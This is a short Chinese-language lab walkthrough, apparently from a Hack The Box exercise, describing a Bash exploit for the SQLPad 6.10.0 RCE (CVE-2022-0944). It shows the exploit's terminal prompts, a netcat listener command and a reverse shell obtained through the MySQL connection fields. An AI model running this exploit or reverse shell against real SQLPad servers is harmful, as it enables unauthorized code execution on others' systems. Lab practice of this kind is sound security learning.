此 Bash 脚本利用 SQLPad 6.10.0 中的 RCE 漏洞,通过滥用 SQLPad 的 MySQL 数据库连接设置中的 host 和 database 字段,实现远程代码执行(RCE)。该漏洞利用 SQLPad 对 Node.js 中 child_process 模块的不安全处理,执行任意命令,最终在攻击者机器上开启一个反向 shell。
nc -lvnp 9001 启动了一个监听器。┌──(kali㉿kali)-[~/HTB/machines/sightless]
└─$ ./CVE-2022-0944
请确保在攻击机器上使用以下命令启动监听器:
nc -lvnp 9001
等待您设置监听器...
准备就绪后按 [Enter]...
请输入目标主机(例如 x.x.com):
x.example.com
请输入您的 IP 地址(例如 10.10.16.3):
0.0.0.0
漏洞利用已发送。如果一切顺利,请检查监听器是否通过端口 9001 建立连接。
此代码仅供教育用途。未经授权访问计算机系统是非法的。仅在获得许可的情况下使用此漏洞利用。